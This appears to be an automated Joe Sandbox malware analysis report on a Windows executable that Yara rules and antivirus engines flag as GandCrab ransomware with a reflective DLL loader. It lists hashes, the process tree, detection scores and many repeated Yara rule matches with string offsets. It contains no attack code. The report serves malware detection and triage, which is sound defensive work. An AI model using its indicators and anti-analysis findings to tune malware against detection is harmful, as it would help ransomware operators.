Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vy3mvlAaCZ.exe

Overview

General Information

Sample Name:vy3mvlAaCZ.exe
Analysis ID:694561
MD5:1873a210d41acdef243e921f3810803a
SHA1:6fa90a229148759d12c63bee342e55fa887f6976
SHA256:34c779bada9918972748153c3f618d6656148748478beec1ec57c7bb5e363593
Tags:exe
Infos:

Detection

Gandcrab, ReflectiveLoader
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ReflectiveLoader
Machine Learning detection for sample
Found API chain indicative of sandbox detection
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found large amount of non-executed APIs
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)

Classification

Process Tree

  • System is w10x64
  • vy3mvlAaCZ.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\vy3mvlAaCZ.exe" MD5: 1873A210D41ACDEF243E921F3810803A)
    • WerFault.exe (PID: 4940 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
vy3mvlAaCZ.exeReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
  • 0x10bb8:$x1: ReflectiveLoader
  • 0x22a82:$x1: ReflectiveLoader
vy3mvlAaCZ.exeSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
  • 0x22246:$: DECRYPT.txt
  • 0x22298:$: DECRYPT.txt
vy3mvlAaCZ.exeJoeSecurity_GandcrabYara detected GandcrabJoe Security
    vy3mvlAaCZ.exeJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
      vy3mvlAaCZ.exeINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
      • 0x22a81:$s1: _ReflectiveLoader@
      • 0x22a82:$s2: ReflectiveLoader@
      Click to see the 2 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
        00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
          00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
            00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
              00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
                Click to see the 5 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.vy3mvlAaCZ.exe.944250.5.unpackReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
                • 0xe832:$x1: ReflectiveLoader
                0.0.vy3mvlAaCZ.exe.944250.5.unpackSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
                • 0xdff6:$: DECRYPT.txt
                • 0xe048:$: DECRYPT.txt
                0.0.vy3mvlAaCZ.exe.944250.5.unpackJoeSecurity_GandcrabYara detected GandcrabJoe Security
                  0.0.vy3mvlAaCZ.exe.944250.5.unpackJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
                    0.0.vy3mvlAaCZ.exe.944250.5.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                    • 0xe831:$s1: _ReflectiveLoader@
                    • 0xe832:$s2: ReflectiveLoader@
                    Click to see the 79 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: vy3mvlAaCZ.exeAvira: detected
                    Multi AV Scanner detection for submitted file
                    Source: vy3mvlAaCZ.exeVirustotal: Detection: 85%Perma Link
                    Source: vy3mvlAaCZ.exeMetadefender: Detection: 74%Perma Link
                    Source: vy3mvlAaCZ.exeReversingLabs: Detection: 96%
                    Machine Learning detection for sample
                    Source: vy3mvlAaCZ.exeJoe Sandbox ML: detected
                    Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                    Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                    Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                    Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpackAvira: Label: TR/Crypt.EPACK.Gen2
                    Source: vy3mvlAaCZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: vy3mvlAaCZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Yara detected Gandcrab
                    Source: Yara matchFile source: vy3mvlAaCZ.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.259577181.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.256875847.0000000000943000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.260275699.0000000000944000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vy3mvlAaCZ.exe PID: 4268, type: MEMORYSTR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: vy3mvlAaCZ.exe, type: SAMPLEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: vy3mvlAaCZ.exe, type: SAMPLEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: vy3mvlAaCZ.exe, type: SAMPLEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                    Source: 0.0.vy3mvlAaCZ.exe.930000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                    Source: vy3mvlAaCZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: vy3mvlAaCZ.exe, type: SAMPLEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: vy3mvlAaCZ.exe, type: SAMPLEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: vy3mvlAaCZ.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: vy3mvlAaCZ.exe, type: SAMPLEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: vy3mvlAaCZ.exe, type: SAMPLEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.vy3mvlAaCZ.exe.944250.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.2.vy3mvlAaCZ.exe.944250.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.2.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.vy3mvlAaCZ.exe.930000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                    Source: 0.0.vy3mvlAaCZ.exe.930000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.0.vy3mvlAaCZ.exe.944250.3.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
